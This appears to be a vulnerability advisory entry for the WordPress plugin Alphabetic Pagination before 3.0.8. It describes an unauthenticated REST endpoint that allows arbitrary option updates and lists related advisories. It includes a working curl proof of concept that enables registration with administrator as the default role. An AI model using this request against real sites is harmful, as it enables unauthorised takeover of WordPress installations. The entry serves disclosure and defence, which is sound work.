Alphabetic Pagination < 3.0.8 – Unauthenticated Arbitrary Option Update | Plugin Vulnerabilities

Description

The plugin does not have any proper authorisation in place when updating some settings via a REST endpoint, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary option from the blog and allow registration with a default role of administrator

Proof of Concept

curl -X POST 'https://example.com/wp-json/ap-android-settings/v1/update_ap_settings?jsonSettings=%7b%221%22%3a%7b%22name%22%3a%22users_can_register%22%2c%22value%22%3a%221%22%7d%2c%222%22%3a%7b%22name%22%3a%22default_role%22%2c%22value%22%3a%22administrator%22%7d%7d'

Affects Plugins

alphabetic-pagination

Fixed in 3.0.8

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Verified

Yes

WPVDB ID

3d72b705-f1ab-4e20-aa2d-426b3151eeea

Timeline

Publicly Published

2022-08-25 (about 3 years ago)

Added

2022-08-25 (about 3 years ago)

Last Updated

2022-08-25 (about 3 years ago)

Other

Published

Title

Published

2024-12-05

Title

Ultimate Coming Soon & Maintenance < 1.1.0 - Subscriber+ Template Name Update

Published

2024-01-02

Title

Easy Social Feed < 6.5.3 - Subscriber+ Settings Update

Published

2023-12-27

Title

WooCommerce Warranty Requests < 2.3.0 - Missing Authorization

Published

2025-03-28

Title

Checkout Mestres do WP for WooCommerce 8.6.5 - 8.7.5 - Unauthenticated Arbitrary Options Update

Published

2025-12-31

Title

Headinger for Elementor <= 1.1.4 - Missing Authorization